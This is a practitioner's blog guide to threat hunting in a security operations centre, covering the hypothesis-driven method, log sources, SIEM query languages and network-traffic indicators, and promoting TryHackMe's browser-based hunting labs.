Alert triage is reactive. You wait for a detection to fire, investigate the alert, and either close it or escalate. Threat hunting is different. You do not wait. You form a hypothesis about where an attacker might be hiding in the environment, design a query to test it, and go looking: before anything fires.
Modern SOCs increasingly embed hunting capabilities directly into daily operations rather than treating it as a separate function. Analysts dedicate portions of their time to hypothesis-driven investigations between alert handling. Organisations report a 40% improvement in overall threat detection when hunting is properly integrated into SOC workflows.
This is the practical guide to doing it: in a browser, without enterprise infrastructure, using the methodology and tools that real threat hunters use.
What Is Threat Hunting and How Is It Different From Alert Triage?
Alert triage asks: what is this alert telling me? Threat hunting asks: what might be happening that no alert has caught yet?
Sophisticated adversaries use tactics like living-off-the-land, zero-day exploits, and cloud-native attacks to blend in with legitimate activity, frequently bypassing automated detection. SOC threat hunting flips the script by empowering analysts to form hypotheses, investigate anomalies, and uncover threats before they escalate.
The practical difference is in how you use the SIEM. Alert triage means reading what the platform surfaces. Threat hunting means writing the queries yourself, asking questions the platform was not configured to ask, and looking for patterns that exist in the data but have not been flagged.
The limitation of a SIEM is that it is query-driven. You find what you know to ask for. Novel threats that fall outside predefined correlation rules or known indicators of compromise can sit in SIEM data for months without surfacing. Threat hunting is how you find them.
What Does Threat Hunting Look Like in Practice?
There are three main approaches: structured hunting, which follows a formal methodology based on known threats and hypotheses often mapped to MITRE ATT&CK; unstructured hunting, which relies on analyst intuition and exploration to identify anomalies without a predefined hypothesis; and situational or entity-driven hunting, which focuses on specific high-risk entities or recent events such as a new vulnerability or insider threat.
For analysts getting started, structured hunting is the right place to begin. It is repeatable, documentable, and teachable. Here is what it looks like step by step.
Step 1: Form the hypothesis. A good hunting hypothesis is specific and falsifiable. Not "there might be malware" but "an attacker with initial access is using PowerShell to execute commands and move laterally, and I should be able to see that in process creation logs." Hypothesis-driven hunting often maps to MITRE ATT&CK tactics: such as credential access or lateral movement, to provide structure and alignment with known adversary workflows.
Step 2: Identify the data source. Which logs would contain evidence of this behaviour if it were happening? Windows Event ID 4688 for process creation. Zeek conn.log for unusual outbound connections. DNS logs for high-frequency queries suggesting C2 beaconing. The hypothesis determines the data source. The data source determines the query.
Step 3: Write and run the query. In Splunk, this means SPL. In Sentinel, KQL. The query is designed to return results that would confirm or refute the hypothesis. A good query filters aggressively: you are not looking for all PowerShell execution, you are looking for PowerShell execution with specific flags that indicate weaponisation (-EncodedCommand, -NonInteractive, -WindowStyle Hidden).
Step 4: Analyse and pivot. A single hypothesis may be refined iteratively as evidence is uncovered, allowing hunters to pivot through the environment and correlate low-signal artifacts into a broader narrative of compromise. When a query returns something interesting, the next question is always: what else happened around this, on this host, at this time?
Step 5: Document and convert. Every hunt produces one of two outcomes: either you found something (investigate and escalate) or you did not (document the hunt and consider converting it to a detection rule so the next occurrence fires automatically). Document hunt activities and findings; automate repetitive tasks to free up analysts for deeper investigations.
Which Tools Do SOC Analysts Use for Threat Hunting?
| Tool | What hunters use it for | Key data it provides | Query language | Practise on TryHackMe |
|---|---|---|---|---|
| Splunk | Log aggregation and correlation. Writing hunt queries across multiple data sources in a single interface. | Windows events, network logs, endpoint telemetry, authentication logs | SPL (Search Processing Language) | Threat Hunting module |
| Microsoft Sentinel | Cloud-native SIEM. Dominant in enterprise Microsoft environments. Hunting notebooks and analytics rules. | Azure AD, Microsoft 365, Windows, network, identity logs | KQL (Kusto Query Language) | Threat Hunting module |
| Wireshark | Network traffic analysis. Inspecting packet captures for C2 beaconing, data exfiltration, and lateral movement over the network. | Full packet capture, protocol decode, session reconstruction | Display filter syntax | SOC Level 1 path |
| Zeek | Structured network log generation. Hunting across conn.log, dns.log, http.log, ssl.log for anomalous patterns. | Connection metadata, DNS queries, HTTP activity, TLS certificates | Log-based querying (grep, awk, or SIEM ingest) | SOC Level 1 path |
| YARA | Pattern matching against files and memory. Writing rules to hunt for specific malware families or code patterns across a file system. | File system, memory dumps, binaries | YARA rule syntax | Threat Hunting module |
| MITRE ATT&CK Navigator | Mapping hunt coverage against known adversary TTPs. Identifying which techniques your current hunts do not cover. | Adversary tactics and techniques framework | Browser-based, no query language | Threat Hunting module |
How Do You Practise Threat Hunting Without an Enterprise Environment?
This is the question most analysts at Tier 1 ask when they want to develop hunting skills but do not yet have access to a live SOC environment with meaningful data. The answer is that browser-based lab environments solve this problem directly.
TryHackMe's Threat Hunting module puts you inside a pre-configured environment with real log data, working SIEM tooling, and structured scenarios that mirror what genuine threat hunting investigations look like. You are not reading about how to write an SPL query. You are writing one against actual data, investigating actual anomalies, and documenting what you find.
The specific value of doing this in a browser: zero infrastructure overhead. No Splunk licence, no SIEM deployment, no log pipeline to configure. You open the room and you are already inside the environment. That is the same reason the TryHackMe platform exists for security training generally, and it applies equally to threat hunting specifically.
The SOC Level 1 path builds the foundational SIEM and log analysis skills that threat hunting extends. If SIEM queries feel effortful rather than automatic, the SOC Level 1 path is the right place to build that fluency before moving into hunting-specific scenarios.
What Are the Best Practices for Network Traffic Analysis in Threat Hunting?
Network traffic analysis is one of the highest-value data sources for threat hunting and one that many analysts underuse because interpreting raw packet data is slower than reading SIEM alerts.
The practical approach is to use Zeek's structured logs rather than raw PCAP for most hunting scenarios. Zeek transforms raw traffic into structured fields: source IP, destination IP, port, protocol, bytes transferred, duration, and more: all queryable without reading individual packets. For most threat hunting hypotheses involving network behaviour, Zeek logs are faster and more scalable than Wireshark.
What to hunt for in network data: DNS queries to newly registered domains or domains with high entropy names (common indicators of DGA activity); regular outbound connections to the same destination at fixed intervals with consistent byte counts (C2 beaconing); large outbound data transfers outside business hours (exfiltration); and internal lateral movement visible as SMB or RDP connections between hosts that do not normally communicate.
Wireshark becomes valuable when you need to go deeper on a specific connection: reconstructing the session, reading the payload, or verifying that encrypted traffic has the characteristics of the protocol it claims to be.
FAQ
What is threat hunting in a SOC? Threat hunting is the proactive practice of searching for threats that automated detection has not caught. Where alert triage responds to what the SIEM flags, threat hunting involves analysts forming hypotheses based on known adversary behaviour, writing queries to test those hypotheses against available log data, and investigating the results to determine whether a threat is present.
How is threat hunting different from incident response? Incident response begins when a confirmed incident has been identified. Threat hunting takes place before confirmation, often before any alert has fired. Hunters look for signs of compromise that have not yet triggered a detection. When a hunt finds something, that finding typically initiates an incident response.
What skills do you need to start threat hunting? SIEM proficiency is the most important prerequisite. You need to be able to write queries, interpret results, and correlate data across multiple log sources before hunting is productive. Familiarity with MITRE ATT&CK, Windows event log IDs, and network traffic patterns are the next layer. Scripting in Python or PowerShell helps with automation but is not required to begin.
Can you practise threat hunting without enterprise infrastructure? Yes. TryHackMe's Threat Hunting module provides pre-configured environments with real log data and working tooling in a browser. This removes the infrastructure barrier that stops most analysts from practising hunting skills outside of their workplace.
What is the best way to get started with threat hunting? Start with a structured hypothesis mapped to a specific MITRE ATT&CK technique you understand well. Choose a data source you are already familiar with: Windows event logs if you have SIEM experience, network logs if you have networking experience. Write a query, run it, investigate what comes back. Document the process. Repeat with a different technique. Hunting ability is built through repetition, not through reading about it.
Nick O'Grady